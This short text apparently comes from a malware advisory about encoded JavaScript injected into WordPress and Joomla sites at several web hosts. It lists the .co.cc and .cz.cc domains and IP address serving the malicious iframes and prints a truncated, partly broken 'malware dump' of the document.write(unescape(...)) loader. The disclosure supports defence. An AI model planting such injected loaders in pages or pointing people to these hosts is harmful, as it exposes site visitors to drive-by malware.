Description:Encoded javascript that loads malware (iframes) from multiple .co.cc domains (hosted at 91.193.194.155):
http://js-o-mcne.cz.cc/26
http://js-o-wiuf.cz.cc/50
google-analytisc.co.cc
js-o-kcjh.cz.cc
js-o-mcvbw.cz.cc
js-o-sfddv.cz.cc
js-o-wiuf.cz.cc
oiihgw.co.cc
oiwdd.co.cc
pojdue.co.cc
Affecting: Any web site (common on WordPress and Joomla) hosted at Rackspace, Mediatemple and Bluehost.
Malware dump:
document.write(unes cape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%..
%2D%77%69%75%6.F%73%63%72%69%70%74%3E"